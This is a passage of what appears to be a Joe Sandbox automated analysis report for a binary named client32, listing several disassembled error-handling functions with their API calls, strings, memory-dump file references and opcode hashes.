                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Image$CountErrorExitLastList_MessageProcesswsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
                                                                                                                              • API String ID: 3979668856-4007669474
                                                                                                                              • Opcode ID: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
                                                                                                                              • Instruction ID: da6b7ee7688318b2dcaecae8c32772a12d0a8ac3ffe856306cb0240b92e991ba
                                                                                                                              • Opcode Fuzzy Hash: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
                                                                                                                              • Instruction Fuzzy Hash: 99D02230E40136ABC3209A94BC02BC9B3886F05208F0C0465F06256040E6B468808A84
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111100D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                                                              • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                                                              • API String ID: 2400454052-4183089485
                                                                                                                              • Opcode ID: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
                                                                                                                              • Instruction ID: 41d86d8e6b2fa9399a940e20fae9938a479a885d6893b5e9ee770bdda361f714
                                                                                                                              • Opcode Fuzzy Hash: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
                                                                                                                              • Instruction Fuzzy Hash: D4D01231E80736AFD7209AE5AC05BD6F3B85B04315F044539F012A6584DAB0A4458BE5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hWnd, xrefs: 1101D3A3
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 1590435379-2830328467
                                                                                                                              • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                                              • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                                                              • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                                              • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11154210 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 11154234
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hWnd, xrefs: 11154223
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115421E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 67735064-2830328467
                                                                                                                              • Opcode ID: 1d54aad98bb84251d308c7fdba18d94c17ec73c60877c839a460b4fca593964e
                                                                                                                              • Instruction ID: 19f6c6fa1a7f22991327a281ba6cc225d63cdd76b5fbcf1c4c4c0146bd397b80
                                                                                                                              • Opcode Fuzzy Hash: 1d54aad98bb84251d308c7fdba18d94c17ec73c60877c839a460b4fca593964e
                                                                                                                              • Instruction Fuzzy Hash: DBD022B1A50236ABCB908691FC86BC5F3949B0A308F000436F03262404E2B4A4808391
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%